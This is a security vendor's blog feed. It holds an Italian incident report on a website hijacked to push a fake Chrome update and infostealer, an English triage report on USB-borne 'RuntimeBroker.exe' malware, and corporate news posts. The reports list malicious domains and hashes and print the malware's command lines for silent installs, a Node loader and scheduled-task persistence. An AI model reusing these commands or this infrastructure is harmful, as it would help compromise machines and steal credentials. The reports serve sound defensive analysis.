In rete è anche possibile trovare un riferimento alla kill chain ricostruita in questo incidente di sicurezza.

Questo report ha l'obiettivo di delineare lo sviluppo dell’incidente e le necessarie contromisure da adottare.

Analizzare ogni fase dell'attacco ci permette non solo di capire le modalità di compromissione, ma anche di affinare continuamente le nostre tecniche di difesa per garantire una protezione sempre più efficace ai nostri clienti.

3. Strumenti di analisi utilizzati

Al fine di svolgere un’analisi esaustiva, sono stati utilizzati i seguenti strumenti:

Sandbox Windows 10, impiegata come macchina virtuale per analizzare il comportamento del payload individuato.

Questo approccio ci ha permesso di osservare in un ambiente controllato e sicuro come il malware agisse una volta eseguito, fornendoci informazioni cruciali per comprendere la minaccia e aggiornare opportunamente i sistemi di difesa per neutralizzare in futuro la minaccia stessa.

4. Analisi effetuate

Il team di Incident Response di Certego ha proceduto, in prima istanza, a effettuare l’analisi dei payload scaricabili da un utente vittima sotto forma di script PowerShell offuscato, per iniziare a ricostruire la kill chain dell’attacco. A seguito dell’analisi degli script, sono state condotte ulteriori indagini sul portale istituzionale al fine di identificare la vulnerabilità sfruttata dagli attaccanti, che ha permesso loro di caricare il modale del fake update indicato precedentemente. Infine, è stato esaminato l’intero codice della web app per capire come il sito sia stato compromesso.

4.1 Kill Chain

Il primo payload in PowerShell analizzato si occupa di effettuare una richiesta HTTP al dominio rtattack[.]baqebei1[.]online con l’obiettivo di scaricare il secondo stage del malware sulla macchina vittima:

Successivamente all’esecuzione, viene scaricato un secondo script PowerShell. Il suo codice offuscato è costituito da varie funzioni; di seguito elencate:

La prima funzione (function G) agisce da "virtual machine evasion": lo script verifica se è in esecuzione su una macchina virtuale o su una macchina fisica. Per determinare se si trova all'interno di una macchina fisica, vengono controllati i sensori di temperatura, che non sono presenti in una macchina virtuale. Se la verifica fallisce, lo script si chiude senza compiere alcuna azione.

Dettaglio della function G.

Le funzioni di seguito riportate, si occupano della decifratura dello script e dello scaricamento del malware vero e proprio:

Per le analisi di contesto, è stata eliminata la funzione di “VM Evasion”; in questo modo è stato possibile effettuare il download del terzo stage dell’attacco, un file compresso contenente un malware di tipo infostealer. Lo script PowerShell scarica il file, decomprime l’archivio ed esegue il malware.

L'Infostealer, successivamente, effettua una “code injection” in processi già in esecuzione e leciti, sovrascrivendo la loro memoria per evitare di essere intercettato dai software antivirus. Il malware tenta di estrarre le credenziali salvate in memoria e di inviarle tramite una chiamata HTTP di tipo POST al dominio cdnforfiles[.]xyz.

La kill chain è stata ricostruita attraverso l’analisi dei vari redirect e payload:

In primis, vi è stata la violazione del sito istituzionale e conseguente inserimento di un fake update di Chrome;
Cliccando sul fake update viene eseguito uno script PowerShell, offuscato in base64, che redirige al dominio rtattack[.]baqebei1[.]online;
Da quel dominio viene scaricato un secondo payload sotto forma di script PowerShell, cifrato usando l’algoritmo AES128, che esegue il download del malware vero e proprio;
Viene scaricato il payload data.zip che contiene un malware di tipo infostealer, immediatamente eseguito;
L’infostealer, eseguendo una code injection in processi leciti, come ad esempio “searchindexer.exe”, ruba le credenziali di accesso ed effettua una chiamata HTTP di tipo POST verso il dominio cdnforfiles[.]xyz.

Dettaglio delle connessioni eseguite nell’arco dell’esecuzione della kill chain

Dettaglio delle attività malevole eseguite dal malware e identificate dall’antivirus

4.2 Analisi dell'applicazione web

Attraverso lo strumento “developer console” del browser è possibile verificare che il modale viene caricato dal seguente sito esterno: “d1x9q8w2e4[.]xyz”

L’url viene contattato attraverso l’esecuzione di codice Javascript, offuscato in base64, ogni volta che una pagina del sito viene visualizzata nel browser.

Di seguito riportiamo il codice malevolo:

Si può notare la presenza di una funzione (cjs()) che, una volta deoffuscata, rivela la presenza di comandi per il caricamento di elementi HTML nascosti alla vista del navigatore; questi elementi effettuano chiamate HTTP verso due URL:

Il primo URL “*https://bsc-dataseed1[.]binance[.]org*” è legato al crypto mining; è possibile dedurre questo dal codice che contiene l’indirizzo di un wallet sulla piattaforma Binance[2];
Il secondo URL, invece, fa riferimento alla pagina che contiene il modale: “*https://d1x9q8w2e4[.]xyz/8OtaBr/?added=1714577662*”.

Dettaglio del traffico network prodotto dal portale durante l’esecuzione del codice malevolo

All’interno del secondo URL, si scopre un ulteriore Javascript, riportato di seguito:

Quest’ultimo snippet di codice crea il modale malevolo. Se lo eseguiamo nella console di sviluppo del browser, è possibile far comparire il modale in qualsiasi pagina si stia navigando.

Dettaglio dell’esecuzione del codice malevolo sulla homepage di Google

Una ricerca del codice Javascript offuscato, all’interno dei vari file della web app, ci ha consentito di scoprire che tale codice è stato iniettato all'interno del file “/site/wwwroot/wp-includes/theme.php”.

5. IOCs

Tipo	Nome	Hash (SHA256)
URL	cdnforfiles[.]xyz	N/A
URL	rtattack[.]baqebei1[.]online	N/A
URL	bsc-dataseed1[.]binance[.]org	N/A
URL	d1x9q8w2e[4.]xyz	N/A
Archivio compromesso	data.zip	e3322159f52e849fe6e5dd0d264e591b6361ee4d08ec81b490b875e41b60ca2
Eseguibile malevolo	Winnc.exe	34a31ce56c97fdc7a5db20c1dec741830c75d97b87c11c1658754419213ff6d7

6. TTPss

Di seguito viene riportata la lista delle Tattiche, Tecniche e Procedure (TTP) effettuate dall’attaccante e osservate nelle analisi effettuate:

ID	Nome
T1659	Content Injection
T1059.001	PowerShell
T1555	Credentials from Password Stores
T1055	Process Injection

7. References

[1] Proofpoint [2] Binance

Grazie!

ANTIFRAGILE | Come caos e complessità rendono migliori le nostre difese digitali

Pier Giorgio Bergonzi — Mon, 03 Jun 2024 22:00:00 GMT

Quest’anno il Cybersecurity Event di Certego ci porterà nel Labirinto della Masone, il labirinto più grande del mondo e all’interno della proprietà di Franco Maria Ricci, noto editore e collezionista d’arte.

Martedì 4 giugno sarà una giornata di incontri e di progetti. Giornalisti, accademici e esperti in materia di cybercrime guideranno i partecipanti attraverso le insidie del labirinto digitale in cui ci troviamo, suggerendo consigli pratici per navigare al meglio questo ambiente complesso e guidare la nostra realtà aziendale fra evoluzione e antifragilità

Scopri i dettagli dell'evento.

Certego è Silver Sponsor di Modena Pride 2024

Wed, 22 May 2024 22:00:00 GMT

Quest'anno anche Certego ha deciso di sostenere il Modena Pride, l'evento dedicato alla celebrazione dell’orgoglio LGBTQIA+ per rivendicare parità dei diritti e maggiore giustizia sociale, promuovendo la partecipazione dell’intera cittadinanza.

Siamo orgogliosi di essere Silver Sponsor dell’edizione 2024, che si terrà sabato 25 maggio, organizzata da Arcigay Modena “Matthew Shepard” e Agedo Bologna.

La sponsorizzazione riflette la precisa volontà di Certego di investire sull’inclusività e sulla parità di trattamento per tutti i propri dipendenti e collaboratori. Crediamo fermamente che l’orientamento sessuale, il colore della pelle, il credo politico o religioso e tutte le altre mille differenze che distinguono ognuno di noi siano un bene prezioso, da conservare, custodire e valorizzare. Riteniamo che il benessere di un’azienda inizi dal modo in cui ciascuno si percepisce all’interno di essa. Per questo vogliamo sottolineare ancora una volta come Certego sia, per definizione e in tutto e per tutto, un posto sicuro! 🌈

Tutti i dettagli del programma dell’evento sono disponibili sulla pagina ufficiale: Modena Pride

Threat Intelligence - Vulnerability insights

Mon, 13 May 2024 22:00:00 GMT

Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di aprile 2024, identificate dal nostro team di Threat Intelligence.

Compila il form e ricevi il PDF

Weekly Highlights - May 10th

Thu, 09 May 2024 22:00:00 GMT

NIST released CSF 2.0: Small Business Quick Start.

#Resources

The guide is designed to assist small and medium-sized enterprises (SMEs) in initiating cybersecurity risk management and reduction efforts.

New Latrodectus malware attacks use Microsoft, Cloudflare themes.

#Malware

The malware is being spread in phishing campaigns using Microsoft Azure and Cloudflare lures to appear legitimate and evade detection by email security platforms.

Iranian threat actor APT42 pose as journalists to harvest credentials and access cloud data.

#Cyberwar

The Iranian state-backed hacking outfit called APT42 is making use of enhanced social engineering schemes to infiltrate target networks and cloud environments.

Dell warns of data breach, 49 million customers allegedly affected.

#Data Breach

Dell is warning customers of a data breach after a threat actor claimed to have stolen information for approximately 49 million customers.

#FIRSTCON24

Pier Giorgio Bergonzi, Product Marketing — Thu, 02 May 2024 22:00:00 GMT

Certego è stata selezionata tra le aziende che parteciperanno in qualità di speaker al #FIRSTCON24, il principale evento internazionale organizzato dal FIRST (the global Forum of Incident Response and Security Teams), che quest’anno avrà luogo a Fukuoka, in Giappone.

Lunedì 10 giugno 2024 presenteremo alla platea la soluzione IntelOwl, la piattaforma di Threat Intelligence Investigation di Certego, integrata all’interno della nostra piattaforma di Unified Security Operations, PanOptikon®, che facilita il lavoro quotidiano degli analisti di sicurezza informatica, consentendo loro di risparmiare tempo e aumentare l'efficienza delle operazioni di Detection e Incident Response.

Il #FIRSTCON24 rappresenta uno degli appuntamenti internazionali di riferimento nell'ambito della sicurezza informatica globale; un'occasione eccellente per lo scambio di esperienze, approfondimenti sugli strumenti di cybersecurity più avanzati, e l’analisi delle metodologie e tattiche più all'avanguardia impiegate dai cybercriminali.

La partecipazione di Certego al FIRSTCON24 testimonia il nostro costante impegno nello sviluppare soluzioni tecnologiche proprietarie. Questo approccio ci consente di adattare e affinare rapidamente le nostre soluzioni in risposta alle mutevoli sfide della cybersecurity, per anticipare e contrastare efficacemente le tecniche di attacco sempre più sofisticate, mantenendo così un vantaggio competitivo sugli attaccanti.

Crediamo che la collaborazione sia fondamentale per affrontare efficacemente le sfide della sicurezza informatica. Questa filosofia di cooperazione non solo arricchisce le nostre competenze e capacità, ma contribuisce anche a consolidare la comunità di sicurezza globale, sviluppando un ecosistema più robusto e resistente alle minacce del cybercrime.

Scopri il programma della conferenza

Certego PanoptiCON2024

Pier Giorgio Bergonzi, Product Marketing — Wed, 24 Apr 2024 22:00:00 GMT

PanoptiCON2024, il Cybersecurity Event di Certego, ci porterà nel Labirinto della Masone. Il labirinto più grande del mondo esteso su 7 ettari di terreno ricoperto da canne di bambù all’interno della proprietà di Franco Maria Ricci, noto editore e collezionista d’arte (labirintodifrancomariaricci.it) Certego invita clienti e partner in un luogo simbolico, per raccontare il fragile spazio del complicato labirinto digitale nel quale ci muoviamo e per suggerire consigli pratici al fine di trovare la dimensione più adatta alla nostra realtà aziendale fra evoluzione e antifragilità.

Nel 2023 abbiamo affrontato la forma dell’acqua per descrivere nuove “forme” di adattamento e difesa. Anche quest’anno vogliamo partire da metafore mutuate da madre natura, origine e custode di evoluzione. La natura evolve. L’evoluzione naturale è un comportamento messo in atto dagli organismi per modificarsi a fronte di condizioni avverse. Non è basata solo sulla protezione degli organismi, ovvero su renderli più robusti o resilienti, ma è basata sul cambiamento. Siamo continuamente esposti a rischi che possono danneggiarci.

Con PanoptiCON2024 vogliamo creare una riflessione sul parallelismo applicabile al principio di antifragilità in natura e in azienda. Dal Labirinto della Masone, immersi in una foresta di canne di bambù, partiremo proprio dalle virtù di questa prodigiosa pianta che sferzata dal vento e della pioggia, si piega ma non si spezza, anzi, assorbe energia e la rigenera in bene comune: si modifica, cambia e torna più forte di prima.

Un sistema antifragile è quel sistema che subisce l’evento traumatico, lo fa proprio, e lo sfrutta per migliorare. Abbraccia l’imprevisto, l’incertezza e ne assume positivamente il rischio. Questo principio di antifragilità è applicabile a qualsiasi ambito ed indica quindi l’attitudine a modificarsi e migliorare a fronte di sollecitazioni, fattori di stress, volatilità, disordine. Il labirinto ci è sembrato il luogo ideale dove sperimentare questi temi perchè rappresenta l’emblema universale della ricerca. Di fondo, parla della complessità del Mondo ed è una sorta di cammino anche all’interno di sé stessi, nello sforzo di superare ostacoli sempre maggiori, cambiare, accettare le richieste di cambiamento e migliorare attraverso l’apprendimento.

Nella giornata del 4 giugno ascolteremo numerosi keynote speaker, viaggeremo nel labirinto complesso degli scenari attuali della cyber security con cyber guru e geopolitici, esploreremo il principio di antifragilità in natura con botanici, saggisti ed insieme agli analisti e i tecnici Certego scoveremo le risposte e le possibili vie d’uscita per rendere le nostre capacità aziendali più antifragili e adattabili.

Le iscrizioni apriranno a breve e presto sarà disponibile l’agenda completa dell’evento. Stay tuned!

State of cybersecurity - 2023 RECAP

Mon, 15 Apr 2024 22:00:00 GMT

State of Cybersecurity è la ricerca realizzata da Certego per AUSED, l’Associazione tra Utenti di Sistemi e Tecnologie dell’informazione che raccoglie oltre duecento aziende.

L’obiettivo della ricerca, basata su un campione di 1.200.000 asset monitorati all’interno della piattaforma PanOptikon, è confrontare i volumi di attacco del 2023, con quelli del 2022. Il seguente report confronta tutto l'anno 2023 con lo stesso periodo dell'anno precedente.

Gli incidenti sono diventati più pericolosi? Quali sono le superfici di attacco più a rischio? Quali sono i settori maggiormente esposti? Qual è il rapporto tra falsi positivi e incidenti reali?

Sono alcune delle domande a cui rispondiamo all’interno del report.

Compila il form e ricevi il PDF

Weekly Highlights - April 5th

Thu, 04 Apr 2024 22:00:00 GMT

ENISA publishes a study on ‘Best Practices for Cyber Crisis Management’ that assists in preparation for crisis management. The study was conducted for the EU Cyber Crisis Liaison Organisation Network (CyCLONe) and is now available publicly

#European Union

This study aims to identify and collect information on future cybersecurity threats that could affect the Union’s infrastructure and services.

A new phishing-as-a-service (PhaaS) called “Darcula” is targeting victims worldwide.

#Threat Actors

Chinese-language, phishing-as-a-service platform "Darcula" has created 19,000 phishing domains in cyberattacks against more than 100 countries.

Finland Blames Chinese Hacking Group APT31 for Parliament Cyber Attack.

#Threat Actors

The breach was first disclosed in December 2020, designed to penetrate the Parliament's information systems.

The banking trojan known as Mispadu targets Europe, thousands of credentials compromised.

#Threat Actors

Targets of the ongoing campaign include entities spanning finance, services, motor vehicle manufacturing, law firms, and commercial facilities.

Certego agli Honeynet Project Workshop 2024 di Copenhagen

Pier Giorgio Bergonzi, Product Marketing — Mon, 01 Apr 2024 22:00:00 GMT

Certego sarà tra i protagonisti dei workshop 2024 di The Honeynet Project, che si terranno dal 27 al 29 maggio a Copenhagen. Matteo Lodi, Simone Berni e Daniele Rosetti di Certego guideranno i partecipanti in un percorso pratico per esplorare IntelOwl, la piattaforma di Threat Intelligence di Certego. Mediante sessioni hands-on, verranno illustrate le potenzialità di IntelOwl nelle operazioni di analisi, classificazione e condivisione di dati di intelligence critici, con l'obiettivo di ottimizzare e arricchire le procedure di lavoro degli analisti di cybersecurity.

The Honeynet Project Workshop 2024 si posiziona come un summit di riferimento nell'ambito della sicurezza informatica globale, focalizzato sui temi delle honeypot, deception e Cyber Threat Intelligence. I workshop in programma a Copenhagen mirano a creare un solido ponte di conoscenza e collaborazione tra gli esperti di sicurezza, offrendo un terreno fertile per lo scambio di esperienze e l'approfondimento su strumenti avanzati, metodologie tattiche e le dinamiche sottostanti agli attacchi cybernetici.

L'impegno di Certego nel sostenere e partecipare a iniziative internazionali come the Honeynet Project riflette la nostra profonda convinzione che solo attraverso la collaborazione possiamo affrontare efficacemente le sfide della sicurezza informatica. Questo approccio collaborativo non solo amplia le nostre conoscenze e capacità, ma rafforza anche la comunità globale di sicurezza nel suo insieme, costruendo un ecosistema più resiliente contro le minacce cyber.

IntelOwl

IntelOwl è la piattaforma Open Source di Certego, integrata nativamente all’interno della piattaforma di Unified Security Operations PanOptikon®, che consente di aggregare, classificare e condividere informazioni critiche, come gli indicatori di compromissione (IOC) e l'analisi di diversi tipi di osservabili (quali IP, domini, hash e file completi), ma anche di facilitare e migliorare il lavoro degli analisti di sicurezza informatica.

La nuova release di IntelOwl, rilasciata il 28 marzo 2024, apporta un significativo avanzamento con l'integrazione del framework di indagine. Questo strumento consente agli analisti di condurre indagini dettagliate su più indicatori specifici di compromissione e di collegarli tra loro, fornendo un quadro completo delle attività sospette. Grazie a questa funzionalità, gli analisti ora dispongono di una piattaforma unificata per l'aggregazione, l'analisi individuale e la correlazione degli indicatori, facilitando la costruzione di dettagliate mappe investigative.

Certego è la prima azienda italiana certificata Trusted Cloud Provider da Cloud Security Alliance

Pier Giorgio Bergonzi, Product Marketing — Thu, 28 Mar 2024 23:00:00 GMT

Certego è l'unica azienda italiana ad aver ottenuto la certificazione di Trusted Cloud Provider rilasciata da Cloud Security Alliance (CSA), un riconoscimento che evidenzia la posizione di eccellenza dell'azienda nel settore dei servizi gestiti di cybersecurity e il costante impegno nell'adottare le migliori pratiche per rafforzare la postura di sicurezza dei propri clienti.

Il programma Trusted Cloud Provider consente alle organizzazioni di dimostrare il loro impegno verso una sicurezza e servizi olistici come punto di riferimento per i clienti che cercano di identificare i fornitori di servizi basati sul cloud allineati con i loro requisiti di sicurezza.

Per Certego, conseguire tale certificazione rappresenta non solo un traguardo significativo ma anche l'assunzione di un impegno costante verso l'eccellenza e l'innovazione dei servizi erogati ai propri clienti. Ciò dimostra che Certego va oltre il semplice rispetto degli standard, attraverso l'adozione delle tecnologie e delle pratiche di sicurezza più avanzate nell'ambito dei servizi basati sul cloud.

I clienti che scelgono i servizi di Certego possono pertanto riporre la loro fiducia in un partner che non solo dispone di competenze tecnologiche di spicco ma che dimostra anche un impegno costante nel migliorare la propria postura di sicurezza e quella dei propri clienti.

IntelOwl v6 release

Pier Giorgio Bergonzi, Product Marketing — Wed, 27 Mar 2024 23:00:00 GMT

Quando all’inizio del 2020 abbiamo dato vita al progetto IntelOwl, eravamo consapevoli delle sfide che la comunità di cyber security incontrava nell'automatizzare le attività di routine quotidiane nell’ambito della Threat Intelligence. Il nostro obiettivo con IntelOwl era di rispondere a queste esigenze, sviluppando una piattaforma capace non solo di aggregare, classificare e condividere informazioni critiche, come gli indicatori di compromissione (IOC) e l'analisi di diversi tipi di osservabili (quali IP, domini, hash e file completi), ma anche di facilitare e migliorare il lavoro degli analisti di sicurezza informatica.

Nel corso degli anni, la versione open source di IntelOwl ha guadagnato un ampio consenso, testimoniato dalle oltre 3.000 "stars" sulla piattaforma GitHub, e ha continuato a evolversi, semplificando le operazioni giornaliere degli analisti.

IntelOwl, nella sua versione più avanzata, è parte integrante dell’ecosistema Certego, e grazie all'integrazione nativa con la piattaforma PanOptikon®, permette di raccogliere e condividere ogni tipo di informazioni critica, consentendo di migliorare ulteriormente l'efficacia della nostra piattaforma MDR e velocizzare le attività di analisi e risposta agli incidenti del team di Security Operations di Certego.

A quattro anni dal lancio, oggi la sesta release di IntelOwl rappresenta un punto di svolta cruciale per il software di Threat Intelligence di Certego. Dall’ultima release ad oggi abbiamo lavorato duramente per potenziare e trasformare IntelOwl da una piattaforma di Data Extraction ad una Investigation Platform.

La nuova release di IntelOwl apporta un significativo avanzamento con l'integrazione del framework di indagine. Questo strumento consente agli analisti di condurre indagini dettagliate su più indicatori specifici di compromissione e di collegarli tra loro, fornendo un quadro completo delle attività sospette. Grazie a questa funzionalità, gli analisti ora dispongono di una piattaforma unificata per l'aggregazione, l'analisi individuale e la correlazione degli indicatori, facilitando la costruzione di dettagliate mappe investigative.

Con la sesta release, IntelOwl si afferma come il nucleo centrale per avviare indagini approfondite, consentendo agli analisti di documentare i risultati, correlare tra loro le informazioni scoperte e collaborare in maniera efficace. Questa funzionalità è cruciale per garantire una condivisione efficiente delle informazioni di intelligence, ottimizzando le risorse e massimizzando l'efficacia complessiva delle operazioni di Detection e Incident Response. Inoltre, assicura che gli analisti ottengano informazioni strettamente rilevanti per i loro specifici contesti di sicurezza e scenari di minaccia, permettendo così un utilizzo più mirato e strategico delle risorse disponibili.

Malware Analysis

Thu, 21 Mar 2024 23:00:00 GMT

Authors: Gabriele Pippi, Luca Testoni, Mayank Malik, Tommaso Palma, Matteo Ferrari, Federico Totaro, Marco Giovanetti.

Summary

Premises
Malware Analysis and Triage Report: RuntimeBroker.exe
- 2.1 Executive Summary
- 2.2 Static Analysis
- 2.3 Dynamic Analysis
IOCs - Indicator of Compromises
Variants
- 4.1 Variant v.3 (july 11th 2023)
- 4.2 Variant v.4 (september 4th 2023)

1. Premises

This document contains the analysis about a Windows binary file found on several customers during the last year and from the PanOptikon platform. The alerts were about suspicious traffic generated from the machine after the users inserted and opened the USB key. First analysis revealed that the usb icon is a fake image. In reality, it is a .lnk file (used in Windows as a shortcut used to open another file, folder, orapplication) containing a PowerShell string:

The PowerShell script, when launched, performs some network traffic, like some DNS queries and HTTP connections to some malicious urls reported below:

eldi8.github.io
wjecpujpanmwm.tk
vimeo.com
evinfeoptasw.dedyn.io
cdn.discordapp.com
bobsmith.apiworld.cf
cdn.goodfilehosting.it

The resulting connections download and execute an executable called “Runtime Broker.exe” in the following path: C:\Users\Victim\AppData\Local\Temp

The download of the malware could be reproduced using curl, removing the User-Agent value:

2. Malware Analysis and Triage Report: RuntimeBroker.exe

2.1 Executive Summary

2.1.1 Fingerprinting

1_ MD5: 730f84805b3b815bf5f11b4ef0e60ee2

2_ SHA256: 8a492973b12f84f49c52216d8c29755597f0b92a02311286b1f75ef5c265c30d

3_ VirusTotal Report: https://www.virustotal.com/gui/file/8a492973b12f84f49c52216d8c29755597f0b92a02311286b1f75ef5c265c30d

2.1.2 Classification

The classification as of the report writing time is still under investigation. Our Threat Intel Platform identified the urls contacted as a C2 of “TheHive” ransomware group. The Virustotal platform still identifies the binary as a generic malware.

2.1.3 Behavioral Summary

The execution of the binary in a controlled sandbox results into an execution of a fake audio control center.

This behavior is generally related to some sandbox checks by the malware or some missing files that are needed by the malware itself to execute the malicious code. In this particular case our analysis suggests that some files are missing in order to see the real effects of the malware execution. Some more details are included in the static analysis chapter (chapter 2.2).

2.2 Static Analysis

Starting from the VirusTotal analysis, two very suspicious points were observed: the first one is that the Creation date is in the future, and the second one is that the binary is packed using .NET 4.0 framework.

These two techniques are commonly used to confuse the Antivirus (AV) static analysis and to bypass checks.

A packer is a tool often used to obfuscate the function names and references to avoid static analysis not only by AVs, but also by human malware analysts.

The strings contained in the binary could be related to ransomware behavior: there are some Windows API calls to cryptographic DLLs and also some calls to custom functions names, like CreateEncryptor and CreateDecryptor.

There are also references to custom functions related to encryption algorithms, like AES and RSA, and to one way hash functions like MD5.

The stream reference is another clue of the malicious behavior, because ransomware usually encrypts victims files byte-by-byte, increasing the efficiency of the encryption process.

There are also some strings that refer to the Windows API calls used in common code injection techniques:

An interesting thing about the metadata of the packer is that they are in Italian language, which is pretty uncommon for these types of malware.

This is the list of files the binary modifies or looks for, it seems it is searching for a config file called “Runtime Broker.exe.config”.

It also loads some dll related to crypto functions or API calls.

Measuring the entropy of the binary is another way to find clues about the scope.

In this case the entropy is high and constant, that’s a confirmation of obfuscation and malicious behavior.

Entropy measurement

An analysis of the memory dump of the process detected some RSA strings related to a public key:

A SID was also found, which means that the binary looks also to the privileges with which it runs.

2.3 Dynamic Analysis

The execution of the binary in a debugger detected a code injection technique called “Heaven’s gate”.

This technique consists in a binary compiled for a 32-bit system that contains a 64-bit payload. The 64-bit payload is another binary that is injected and executed using the WOW64 environment. A migration from 32 to 64 bit, bypasses most of the AV engines that are not able to track this behavior. The injection itself is done creating a new thread of the victim process in suspended mode; when the payload injection is done, the thread is resumed using a specific API call and the payload is executed. In this case the API call is NTTestAlert.

APC code injection tecnique

Migrant from 32 to 64 bit

Several anti-debugging techniques were also found. The first one is based on a function called GetTickCount(): it counts the seconds between 2 points inside the binary execution and if the time is too high the program is running in a debugger and the original behavior is modified:

Another API call used in the binary is the IsDebuggerPresent(), a function used to know if the binary is running in a debugger environment. If true, the original behavior is modified:

3. IOCs - Indicator of Compromises

IOC	Value
sha256	8a492973b12f84f49c52216d8c29755597f0b92a02311286b1f75ef5c265c30d
md5	730f84805b3b815bf5f11b4ef0e60ee2
url	eldi8.github.io
url	wjecpujpanmwm.tk
url	vimeo.com
url	evinfeoptasw.dedyn.io
url	cdn.discordapp.com
url	bobsmith.apiworld.cf
url	cdn.goodfilehosting.it

4. Variants

4.1 Variant v.3 (july 11th 2023)

We observed some variants during last year, here we attach the differences between the behavior described above and the new versions of the malware:

Powershell explorer.ps1 script loads and requests obfuscated binary data from eldi8.github.io/src.txt
It then, converts the spaces tabs to 1 and 0 and new-lines to to get the .tk domain
then the powershell script makes the request to .tk domain with from=USB&user=
In return, the .tk responds with Dropzone URL for Runtime Broker.exe which in this case is the Discord CDN
the Runtime Broker.exe create a random Temp folder and save inside command.bat and execute.bat
- execute execute.bat saved in the previous folder
- delete the random temp folder
- run net session
- create the persistence via reg.exe

The wjecpujpanmwm.tk domain is offline due to the expired DNS registration, so we probably will see a new version with new domains and features.

Here’s resumed, the changes from the previous version:

Using Discord domain instead of Vimeo to download the Runtime Broker.exe
The eldi8.github.io isn’t offline and is currently used to obfuscate the first stage
Two scripts command.bat and execute.bat are currently created

the execute.bat

the command.bat

The file index.js was not found during the analysis.

4.2 Variant v.4 (september 4th 2023)

Another variant of the RunTime Broker.exe malware emerged in the previous days.

As the previous version, also the last one we have observed is using a batch file present in a directory with a random name in the AppData\Local\Temp parent folder. The batch file is named execute.bat.

Once the cmd.exe execute the batch file two processes are spawned:

runtime brocker.exe
chcp.com

The last process would change the Code page in the active console to a UTF-8 encoding (chcp 65001).

Then the process RunTime Broker.exe spawns a JS file named index.js (the file is located in the AppData\Local\Temp directory).

The JS file is a sort of config file used by the Runtime Broker to executes the following:

C:\program files (x86)\winsoft update service\pythonw.exe "C:\Program Files (x86)\WinSoft Update Service\bootstrap.pyc"
- Netconns to luke.compeyson.eu.org and cdn.goodfilehosting.it (both malicious)
- Child: C:\Program Files (x86)\WinSoft Update Service\pythonw.exe -mpip install -U pytweening==1.0.7 pyscreeze==0.1.29 PyAutoGUI==0.9.54

psutil==5.8.0 playsound==1.2.2 WMI==1.5.1 mouse==0.7.1 keyboard==0.13.5 pyperclip==1.8.2 pycryptodome==3.15.0

appdata\local\temp\py_installer.exe /VERYSILENT /SUPPRESSMSGBOXES/dir=expand:{pf}\pyt37
programdata\adobe\creative cloud experience node\node.exe -e

"require(require('path').dirname(process.execPath) + '/node_modules/loader-module').inst()"

appdata\local\temp\screendim_inst.exe /VERYSILENT /SUPPRESSMSGBOXES
appdata\local\temp\museum_installer.exe /VERYSILENT

/SUPPRESSMSGBOXES /dir="expand:{pf}\WinSoft Update Service"

appdata\local\temp\adob_cinst.exe /VERYSILENT /SUPPRESSMSGBOXES

The Runtime Broker.exe also spawns some Windows legit process, some used to get persistence on system, other to perform recognition:

c:\windows\syswow64\schtasks.exe /RUN /TN ScreenBrightnessRestore [to ensure persistence on the system, ndr]
c:\windows\syswow64\schtasks.exe /create /F /XML "C:\Program Files (x86)\ScreenDim\ScreenBrightnessRestore.xml" /TN ScreenBrightnessRestore [to ensure persistence on the system, ndr]
c:\windows\syswow64\net session
c:\windows\syswow64\reg.exe delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Node_Run /f

We also detected the execution of "C:\Program Files (x86)\ScreenDim\ScreenDim.exe" restore with parent process C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule . ScreenDim.exe then spawns "C:\Program Files (x86)\pyt37\python.exe" -m updater. This last process then makes several netconns to the following malicious domains:

paul.microvortexus.it
cdn.goodfilehosting.it

After the connections Screendim.exe is uninstalled.

Weekly Highlights - March 22nd

Thu, 21 Mar 2024 23:00:00 GMT

ENISA publishes a study on ‘Best Practices for Cyber Crisis Management’ that assists in preparation for crisis management. The study was conducted for the EU Cyber Crisis Liaison Organisation Network (CyCLONe) and is now available publicly

#European Union

EU Parliament approves Cyber Resilience Act

#European Union

The European Union approved new cyber resilience standards to protect all digital products in the EU from cyber threats.

Japanese technology giant Fujitsu confirmed that it fell victim to a cyberattack that likely resulted in the theft of personal and customer information

#Breaches and Incidents

Fujitsu says hackers infected internal systems with malware, stole personal and customer information.

North Korea-linked group levels multistage cyberattack on South Korea

#Cyberwar

Kimsuky group has expanded its attack methodology to an eight-stage chain, leveraging legitimate cloud services and utilizing evasive malware for cyber espionage and financial crimes targeting South Korean entities

MDR: protezione avanzata per la cybersecurity moderna

Pier Giorgio Bergonzi, Product Marketing — Wed, 13 Mar 2024 23:00:00 GMT

Managed Detection and Response (MDR)

Il termine Managed Detection and Response (MDR) identifica un servizio completo di cybersecurity all'avanguardia che unisce soluzioni tecnologiche avanzate con l'expertise umana, per rilevare, identificare e neutralizzare le minacce informatiche in in tempo reale.

Grazie a questo servizio, le aziende possono beneficiare del monitoraggio continuo degli asset IT e dell’analisi approfondita degli eventi per individuare comportamenti anomali e potenziali vulnerabilità, inclusi gli attacchi più sofisticati. La presenza di un Team dedicato di Incident Response, consente di intervenire efficacemente contro le minacce prima che queste possano causare danni.

I provider di MDR agiscono come un'estensione dei team di sicurezza interni, apportando competenze avanzate e supporto continuo per affinare le strategie di sicurezza. Questa sinergia eleva il livello di sicurezza informatica, potenziando la resilienza digitale dell'organizzazione mediante un insieme di funzioni avanzate:

Monitoraggio degli asset aziendali:

la piattaforma MDR monitora gli endpoint, network, cloud, sistemi OT e vulnerabilità, assicurando una protezione completa;
Rilevamento e Risposta:

la piattaforma MDR raccoglie e analizza i dati dei sistemi IT aziendali e integrando algoritmi di rilevamento automatici con l'expertise di analisti esperti, consente di rilevare e rispondere in tempo reale a tutte le tipologie di minacce;
Threat Intelligence:

combinando informazioni di Intelligence sulle minacce esterne con approfondimenti di prima mano sui dati dei clienti, la Cyber Threat Intelligence consente di arricchire le attività di analisi per comprendere e identificare in anticipo le tecniche di attacco più innovative, conferendo all’azienda un vantaggio competitivo nei confronti dei cybercriminali;
Orchestrazione e automazione (SOAR):

tramite l'implementazione di playbook e procedure operative definite durante il deployment, la piattaforma MDR migliora l'efficienza dei processi di cybersecurity, consentendo agli analisti focalizzarsi sulle minacce più critiche e accelerare i tempi di risposta;
Esperienza umana:

oltre alle attività di rilevamento e risposta, il team fornito dal provider MDR offre consulenza proattiva per migliorare i processi di cybersecurity, e supporto per l'ottimizzazione della piattaforma, garantendo configurazioni personalizzate in base alle necessità specifiche dell'azienda e livelli di difesa sempre aggiornati.

